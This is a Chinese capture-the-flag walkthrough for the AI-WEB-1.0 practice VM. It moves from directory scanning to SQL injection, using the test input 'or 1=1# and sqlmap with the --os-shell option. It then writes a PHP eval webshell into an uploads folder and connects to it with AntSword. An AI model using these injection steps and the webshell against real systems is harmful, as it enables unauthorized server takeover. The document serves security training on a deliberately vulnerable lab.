AI-WEB-1.0详细教程

目录

一、主机发现

二、漏洞发现

三、漏洞利用


一、主机发现

启动靶机

虚拟机为NAT模式,我们根据真实机VMnet8的IP将虚拟机的IP扫描出来。

可以看到页面什么都没有。所以我们需要进一步扫描。

扫描目录,index是我们刚刚访问的界面。双击打开robots.txt。

有新发现的目录,我们挨个访问一下看看。

发现只有se3reTdir777能够访问。

二、漏洞发现

看到是查询页面,考虑sql注入。先输入一下 ' 发现报错。

再输入

'or 1=1#

初步判断有SQL注入漏洞,我们用bp抓下包,然后用sqlmap跑一下。

全选复制抓包内容到文本,使用如下命令跑一下:

python sqlmap.py -r C:\Users\sya\Desktop\6.txt –batch

出现此页面,确实存在sql注入

我们接下来的思路是写入木马,但是需要一个可写入路径需要我们找一下。

上面我们扫到的目录有好几个不能访问,我们需要深入对他们扫描一下。

发现了新大陆,我们双击打开看一下是phpinfo。

三、漏洞利用

Ctrl+f 搜索一下/m3diNf0/,发现了路径:/home/www/html/web1x443290o2sdf92213/

我们需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

先用如下命令获取交互式的系统命令执行环境。

python sqlmap.py -r C:\Users\sya\Desktop\6.txt --os-shell

现在我们就可以通过上传一句话木马了。

echo '<?php @eval($_POST['cmd']);?>' > 2.php

蚁剑连接

注:蚁剑连接为连接php可显示页面

这里2.php存放在/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/下

但是不能网页直接访问

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

这里很多人被误导导致无法连接

正常路径在

http://192.168.222.132/se3reTdir777/uploads/2.php

连接成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值